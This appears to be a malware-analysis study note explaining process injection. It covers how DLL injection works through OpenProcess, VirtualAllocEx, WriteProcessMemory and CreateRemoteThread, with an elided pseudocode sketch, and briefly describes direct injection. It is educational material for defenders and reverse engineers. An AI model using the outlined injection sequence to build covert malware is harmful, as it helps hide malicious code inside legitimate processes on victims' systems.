Index > Malware > 2021-02-09: Covert Malware Launching: Process Injection

2021-02-09: Covert Malware Launching: Process Injection

A quick review:

• Downloaders pull malware from somewhere else.
• Launchers may already contain their malware, and are responsible for getting it running.

Process Injection

• DLL Injection
• Direct Injection

DLL Injection

When a process loads a DLL, the OS calls the DLL’s DLLMain function, passing execution to the DLL.

The DLL has the same permissions as the process, and everything it does will appear to come from the process it was loaded by.

Malware uses CreateToolhelp32Snapshot, Process32First, and Process32Next to search for a suitable process - one with the right permissions.

Malware uses OpenProcess to acquire a handle to the target process.

The process to be injected needs memory space to store the name of the malicious DLL to load. Space can be allocated with VirtualAllocEx, and filled with WriteProcessMemory.

From there, CreateRemoteThread can be called with three arguments:

• The target process handle
• The starting point of the new thread
  • Almost always LoadLibraryA
• An argument for that thread

This starts a new thread inside the target process, using LoadLibrary to pull in a malicious DLL. The DLL now has execution, the process’s privileges, and acts as the process.

// Get a handle to the victim
hVictimProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, victimProcessID);

// Allocate space to store the evil DLL name
pNameInVictimProcess = VirtualAllocEx(hVictimProcess, ..., sizeof(maliciousLibraryName), ...);

// Fill that space with the evil DLL name
WriteProcessMemory(hVictimProcess, ..., maliciousLibraryName, sizeof(maliciousLibraryName), ...);

// LoadLibraryA, used later, comes from inside Kernel32.dll
GetModuleHandle("Kernel32.dll"); // Assumes Kernel32 is already loaded

// Get the address of where our new thread should start
LoadLibraryAddress = GetProcAddress(..., "LoadLibraryA");

// Launch a new thread, running LoadLibraryA, with argument maliciousLibraryName
CreateRemoteThread(hVictimProcess, ..., LoadLibraryAddress, pNameInVictimProcess, ...);

// Done: victimProcessID has now loaded our evil DLL.

Direct Injection

This is significantly more difficult than DLL injection. Attackers need to have a good reason to go through the work to do this.

This uses two calls to VirtualAllocEx and WriteProcessMemory.

1. Write resources to the victim process
2. Write malicious code to the victim process

The remote process might not have the libraries that the injected code needs. Strings won’t be in the data section, and there are other restrictions.

Authors of direct injection malware must be highly skilled assembly programmers, or must only inject very simple shellcode.

---

Index > Malware > 2021-02-09: Covert Malware Launching: Process Injection